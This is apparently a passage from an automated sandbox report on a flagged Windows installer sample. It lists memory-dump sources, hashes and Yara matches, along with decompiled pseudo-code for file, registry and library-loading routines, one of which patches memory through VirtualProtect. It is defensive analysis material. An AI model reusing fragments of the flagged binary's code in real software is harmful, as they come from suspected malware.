                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                        • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                        • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: f33ed0dff66fea1e959c59282b562f33b3e0c195c477a4f3d7672620aa75dada
                                                                                        • Instruction ID: cb6a30fca3873d1e74c4f3da6f189d1da622b98f5b6456fe96a8ac2ef16ad0da
                                                                                        • Opcode Fuzzy Hash: f33ed0dff66fea1e959c59282b562f33b3e0c195c477a4f3d7672620aa75dada
                                                                                        • Instruction Fuzzy Hash: DD42D550808BFB959F30DFB968847FF2A950A4B8B0B584B99DDB06A5F7DF3151C2C122
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8e8b61bb44e1f258a826f620d3628c5057e3041322828ec7c68d5f29619a5a21
                                                                                        • Instruction ID: d8a2833f75a2549f4a5d77602a6006907feabd2b1682af71e74805ab1e70cccc
                                                                                        • Opcode Fuzzy Hash: 8e8b61bb44e1f258a826f620d3628c5057e3041322828ec7c68d5f29619a5a21
                                                                                        • Instruction Fuzzy Hash: 7FE1E260908BA796CF309BB858847FF3A920F835B0F5947D9DDB55A1E2DF3181C28662
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: c55c5b6f51d4d92832697ff911ea732a10c0540a436fb95435af773e32ec4c69
                                                                                        • Instruction ID: 947666cfba674c2aa50c0af2c858d3df4d974f731db50961185e2cc5c1ea12ed
                                                                                        • Opcode Fuzzy Hash: c55c5b6f51d4d92832697ff911ea732a10c0540a436fb95435af773e32ec4c69
                                                                                        • Instruction Fuzzy Hash: A0817D7161CBE49FD728AB28DCC8BEA3BA6EF56310F45005EDC86C7153DA789882C711
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 28%
                                                                                        			E6FE02B98(void* __ecx, intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				void* _t28;
                                                                                        				void* _t29;
                                                                                        				int _t33;
                                                                                        				void* _t37;
                                                                                        				void* _t40;
                                                                                        				void* _t45;
                                                                                        				void* _t49;
                                                                                        				signed int _t56;
                                                                                        				void* _t61;
                                                                                        				void* _t70;
                                                                                        				intOrPtr _t72;
                                                                                        				signed int _t77;
                                                                                        				intOrPtr _t79;
                                                                                        				intOrPtr _t80;
                                                                                        				void* _t81;
                                                                                        				void* _t87;
                                                                                        				void* _t88;
                                                                                        				void* _t89;
                                                                                        				void* _t90;
                                                                                        				intOrPtr _t93;
                                                                                        				intOrPtr _t94;
                                                                                        
                                                                                        				if( *0x6fe05050 != 0 && E6FE02ADB(_a4) == 0) {
                                                                                        					 *0x6fe05054 = _t93;
                                                                                        					if( *0x6fe0504c != 0) {
                                                                                        						_t93 =  *0x6fe0504c;
                                                                                        					} else {
                                                                                        						E6FE030C0(E6FE02AD5(), __ecx);
                                                                                        						 *0x6fe0504c = _t93;
                                                                                        					}
                                                                                        				}
                                                                                        				_t28 = E6FE02B09(_a4);
                                                                                        				_t94 = _t93 + 4;
                                                                                        				if(_t28 <= 0) {
                                                                                        					L9:
                                                                                        					_t29 = E6FE02AFD();
                                                                                        					_t72 = _a4;
                                                                                        					_t79 =  *0x6fe05058;
                                                                                        					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                        					 *0x6fe05058 = _t72;
                                                                                        					E6FE02AF7();
                                                                                        					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
                                                                                        					 *0x6fe05034 = _t33;
                                                                                        					 *0x6fe05038 = _t79;
                                                                                        					if( *0x6fe05050 != 0 && E6FE02ADB( *0x6fe05058) == 0) {
                                                                                        						 *0x6fe0504c = _t94;
                                                                                        						_t94 =  *0x6fe05054;
                                                                                        					}
                                                                                        					_t80 =  *0x6fe05058;
                                                                                        					_a4 = _t80;
                                                                                        					 *0x6fe05058 =  *((intOrPtr*)(E6FE02AFD() + _t80));
                                                                                        					_t37 = E6FE02AE9(_t80);
                                                                                        					_pop(_t81);
                                                                                        					if(_t37 != 0) {
                                                                                        						_t40 = E6FE02B09(_t81);
                                                                                        						if(_t40 > 0) {
                                                                                        							_push(_t40);
                                                                                        							_push(E6FE02B14() + _a4 + _v8);
                                                                                        							_push(E6FE02B1E());
                                                                                        							if( *0x6fe05050 <= 0 || E6FE02ADB(_a4) != 0) {
                                                                                        								_pop(_t88);
                                                                                        								_pop(_t45);
                                                                                        								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                        								if(__eflags == 0) {
                                                                                        								}
                                                                                        								asm("loop 0xfffffff5");
                                                                                        							} else {
                                                                                        								_pop(_t89);
                                                                                        								_pop(_t49);
                                                                                        								 *0x6fe0504c =  *0x6fe0504c +  *(_t89 + _t49) * 4;
                                                                                        								asm("loop 0xffffffeb");
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_t107 =  *0x6fe05058;
                                                                                        					if( *0x6fe05058 == 0) {
                                                                                        						 *0x6fe0504c = 0;
                                                                                        					}
                                                                                        					E6FE02B42(_t107, _a4,  *0x6fe05034,  *0x6fe05038);
                                                                                        					return _a4;
                                                                                        				}
                                                                                        				_push(E6FE02B14() + _a4);
                                                                                        				_t56 = E6FE02B1A();
                                                                                        				_v8 = _t56;
                                                                                        				_t77 = _t28;
                                                                                        				_push(_t68 + _t56 * _t77);
                                                                                        				_t70 = E6FE02B26();
                                                                                        				_t87 = E6FE02B22();
                                                                                        				_t90 = E6FE02B1E();
                                                                                        				_t61 = _t77;
                                                                                        				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                        					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                        				}
                                                                                        				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                        				asm("loop 0xfffffff1");
                                                                                        				goto L9;
                                                                                        			}

























                                                                                        0x6fe02ba8
                                                                                        0x6fe02bb9
                                                                                        0x6fe02bc6
                                                                                        0x6fe02bda
                                                                                        0x6fe02bc8
                                                                                        0x6fe02bcd
                                                                                        0x6fe02bd2
                                                                                        0x6fe02bd2
                                                                                        0x6fe02bc6
                                                                                        0x6fe02be3
                                                                                        0x6fe02be8
                                                                                        0x6fe02bee
                                                                                        0x6fe02c32
                                                                                        0x6fe02c32
                                                                                        0x6fe02c37
                                                                                        0x6fe02c3c
                                                                                        0x6fe02c42
                                                                                        0x6fe02c44
                                                                                        0x6fe02c4a
                                                                                        0x6fe02c57
                                                                                        0x6fe02c59
                                                                                        0x6fe02c5e
                                                                                        0x6fe02c6b
                                                                                        0x6fe02c7e
                                                                                        0x6fe02c84
                                                                                        0x6fe02c8a
                                                                                        0x6fe02c8b
                                                                                        0x6fe02c91
                                                                                        0x6fe02c9d
                                                                                        0x6fe02ca3
                                                                                        0x6fe02cab
                                                                                        0x6fe02cac
                                                                                        0x6fe02caf
                                                                                        0x6fe02cba
                                                                                        0x6fe02cbc
                                                                                        0x6fe02cc8
                                                                                        0x6fe02cce
                                                                                        0x6fe02cd6
                                                                                        0x6fe02d02
                                                                                        0x6fe02d03
                                                                                        0x6fe02d05
                                                                                        0x6fe02d09
                                                                                        0x6fe02d09
                                                                                        0x6fe02d10
                                                                                        0x6fe02ce6
                                                                                        0x6fe02ce6
                                                                                        0x6fe02ce7
                                                                                        0x6fe02cf5
                                                                                        0x6fe02cfe
                                                                                        0x6fe02cfe
                                                                                        0x6fe02cd6
                                                                                        0x6fe02cba
                                                                                        0x6fe02d12
                                                                                        0x6fe02d19
                                                                                        0x6fe02d1b
                                                                                        0x6fe02d1b
                                                                                        0x6fe02d34
                                                                                        0x6fe02d42
                                                                                        0x6fe02d42
                                                                                        0x6fe02bf9
                                                                                        0x6fe02bfa
                                                                                        0x6fe02bff
                                                                                        0x6fe02c03
                                                                                        0x6fe02c08
                                                                                        0x6fe02c1c
                                                                                        0x6fe02c1d
                                                                                        0x6fe02c1e
                                                                                        0x6fe02c20
                                                                                        0x6fe02c25
                                                                                        0x6fe02c27
                                                                                        0x6fe02c27
                                                                                        0x6fe02c2a
                                                                                        0x6fe02c30
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000), ref: 6FE02C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 399caadeeee6c9950e539164c781eac668e94d52f285515d52dd7e92b7cec990
                                                                                        • Instruction ID: a269225f601230d633a22a460c78f472a6a30361555cfc28f102d21a8cc3ce67
                                                                                        • Opcode Fuzzy Hash: 399caadeeee6c9950e539164c781eac668e94d52f285515d52dd7e92b7cec990
                                                                                        • Instruction Fuzzy Hash: 3C416271504704EFDF10AFA8D985B5D3FF5EB66328F30842DE8048A250D735A8B59FA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(?), ref: 02A54E0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 937deaa006e4016ff67078081d2b3e0844411ec64de7762bf225a767f230dd14
                                                                                        • Instruction ID: 03815f489dbdc84d62c07de44b7c38dca9225da888aa68adf5a064041a380492
                                                                                        • Opcode Fuzzy Hash: 937deaa006e4016ff67078081d2b3e0844411ec64de7762bf225a767f230dd14
                                                                                        • Instruction Fuzzy Hash: 22217976A003198BDB206E388EA57CB3BB2AF913A0FC6461ECCC907504D3310AD9CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E00402891(intOrPtr __edx, void* __eflags) {
                                                                                        				long _t8;
                                                                                        				long _t10;
                                                                                        				LONG* _t12;
                                                                                        				void* _t14;
                                                                                        				intOrPtr _t15;
                                                                                        				void* _t16;
                                                                                        				void* _t19;
                                                                                        
                                                                                        				_t15 = __edx;
                                                                                        				_pop(ds);
                                                                                        				if(__eflags != 0) {
                                                                                        					_t8 = E00402D84(2);
                                                                                        					_pop(_t14);
                                                                                        					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                                                        					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                                                        					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                                                        						_push(_t10);
                                                                                        						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                        						E00406484();
                                                                                        					}
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                                                                        				return 0;
                                                                                        			}










                                                                                        0x00402891
                                                                                        0x00402891
                                                                                        0x00402892
                                                                                        0x0040289a
                                                                                        0x0040289f
                                                                                        0x004028a0
                                                                                        0x004028af
                                                                                        0x004028b8
                                                                                        0x004028be
                                                                                        0x00402ba1
                                                                                        0x00402ba4
                                                                                        0x00402ba4
                                                                                        0x004028b8
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                          • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointerwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327478801-0
                                                                                        • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                        • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                                                                        • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                                                        • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                        				WCHAR* _t11;
                                                                                        				WCHAR* _t13;
                                                                                        				void* _t17;
                                                                                        				int _t21;
                                                                                        
                                                                                        				_t11 = __ebx;
                                                                                        				_t5 = __eax;
                                                                                        				_t13 = 0;
                                                                                        				if(__eax != __ebx) {
                                                                                        					__eax = E00402DA6(__ebx);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                        					_t13 = E00402DA6(0x11);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                        					_t11 = E00402DA6(0x22);
                                                                                        				}
                                                                                        				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                        				_t21 = _t5;
                                                                                        				if(_t21 == 0) {
                                                                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                                        				return 0;
                                                                                        			}







                                                                                        0x004023b2
                                                                                        0x004023b2
                                                                                        0x004023b4
                                                                                        0x004023b8
                                                                                        0x004023bb
                                                                                        0x004023c0
                                                                                        0x004023c5
                                                                                        0x004023ce
                                                                                        0x004023ce
                                                                                        0x004023d3
                                                                                        0x004023dc
                                                                                        0x004023dc
                                                                                        0x004023e9
                                                                                        0x004015b4
                                                                                        0x004015b6
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 390214022-0
                                                                                        • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                        • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                        • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                        • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                        				void* _t7;
                                                                                        				long _t8;
                                                                                        				void* _t9;
                                                                                        
                                                                                        				_t7 = E00406329(_a4,  &_a12);
                                                                                        				if(_t7 != 0) {
                                                                                        					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                        					return _t8;
                                                                                        				}
                                                                                        				_t9 = 6;
                                                                                        				return _t9;
                                                                                        			}






                                                                                        0x004063e2
                                                                                        0x004063eb
                                                                                        0x00406401
                                                                                        0x00000000
                                                                                        0x00406401
                                                                                        0x004063ef
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                        • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                        • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                        • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                                        				int _t7;
                                                                                        				long _t11;
                                                                                        
                                                                                        				_t11 = _a12;
                                                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					return 1;
                                                                                        				}
                                                                                        			}





                                                                                        0x004060e3
                                                                                        0x004060f3
                                                                                        0x004060fb
                                                                                        0x00000000
                                                                                        0x00406102
                                                                                        0x00000000
                                                                                        0x00406104

                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                        • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                        • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                                        				int _t7;
                                                                                        				long _t11;
                                                                                        
                                                                                        				_t11 = _a12;
                                                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					return 1;
                                                                                        				}
                                                                                        			}





                                                                                        0x004060b4
                                                                                        0x004060c4
                                                                                        0x004060cc
                                                                                        0x00000000
                                                                                        0x004060d3
                                                                                        0x00000000
                                                                                        0x004060d5

                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                        • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                        • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                        
                                                                                        				 *0x6fe05048 = _a4;
                                                                                        				if(_a8 == 1) {
                                                                                        					VirtualProtect(0x6fe0505c, 4, 0x40, 0x6fe0504c); // executed
                                                                                        					 *0x6fe0505c = 0xc2;
                                                                                        					 *0x6fe0504c = 0;
                                                                                        					 *0x6fe05054 = 0;
                                                                                        					 *0x6fe05068 = 0;
                                                                                        					 *0x6fe05058 = 0;
                                                                                        					 *0x6fe05050 = 0;
                                                                                        					 *0x6fe05060 = 0;
                                                                                        					 *0x6fe0505e = 0;
                                                                                        				}
                                                                                        				return 1;
                                                                                        			}



                                                                                        0x6fe02a88
                                                                                        0x6fe02a8d
                                                                                        0x6fe02a9d
                                                                                        0x6fe02aa5
                                                                                        0x6fe02aac
                                                                                        0x6fe02ab1
                                                                                        0x6fe02ab6
                                                                                        0x6fe02abb
                                                                                        0x6fe02ac0
                                                                                        0x6fe02ac5
                                                                                        0x6fe02aca
                                                                                        0x6fe02aca
                                                                                        0x6fe02ad2

                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(6FE0505C,00000004,00000040,6FE0504C), ref: 6FE02A9D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
